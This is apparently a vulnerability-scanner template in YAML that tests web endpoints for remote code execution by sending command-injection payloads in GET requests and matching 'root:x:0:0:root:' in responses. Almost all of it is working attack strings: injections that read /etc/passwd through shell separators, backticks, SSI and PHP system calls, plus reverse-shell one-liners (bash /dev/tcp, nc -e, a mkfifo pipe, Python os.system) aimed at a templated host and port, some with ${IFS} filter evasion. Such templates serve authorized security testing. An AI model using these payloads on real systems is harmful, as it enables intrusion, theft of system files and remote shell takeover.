id: RCE
info:
  name: Remote Code Execution
  severity: high
http:
  method: GET

  payload:
   - "cat /etc/passwd"
   - ";cat /etc/passwd;"
   - "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;"
   - ";cat /etc/passwd"
   - ";system('cat%20/etc/passwd')"
   - "|cat /etc/passwd"
   - "|cat /etc/passwd|"
   - "|cat /etc/passwd;"
   - ";cat /etc/passwd|"
   - ";|cat /etc/passwd|"
   - "`cat /etc/passwd`"
   - "a);cat /etc/passwd"
   - "a;cat /etc/passwd"
   - "a);cat /etc/passwd;"
   - "a;cat /etc/passwd;"
   - "a);cat /etc/passwd|"
   - "a;cat /etc/passwd|"
   - "&& cat /etc/passwd"
   - "|| cat /etc/passwd"
   - ";cat /etc/passwd/n"
   - "foo;cat /etc/passwd;id"
   - "`#{cat /etc/passwd}`"
   - "telnet {{IP}} {{PORT}}"
   - "echo -e \"quit\" | ftp {{IP}} {{PORT}}"
   - "import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{{IP}}/{{PORT}} 0>&1'\")"
   - "xyz $(nc {{IP}}:{{PORT}} -e /bin/bash)"
   - "xyz $(echo -e \"quit\"| ftp {{IP}}:{{PORT}})"
   - "xyz $(telnet {{IP}}:{{PORT}})"
   - ";rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {{IP}} {{PORT}} >/tmp/f"
   - "bash -c 'bash -i >& /dev/tcp/{{IP}}/{{PORT}} 0>&1"
   - ";nc${IFS}-e${IFS}/bin/bash${IFS}{{IP}}${IFS}{{PORT}}"
   - "telnet${IFS}{{IP}}${IFS}{{PORT}}"
   - "echo${IFS}-e${IFS}\"quit\"${IFS}|ftp${IFS}{{IP}}${IFS}{{PORT}}"
   - "`#{nc {{IP}} {{PORT}}}`"
   - "`#{telnet {{IP}} {{PORT}}}`"
   - "`#{ftp {{IP}} {{PORT}}}`"

  matchers:
          - "root:x:0:0:root:"





 
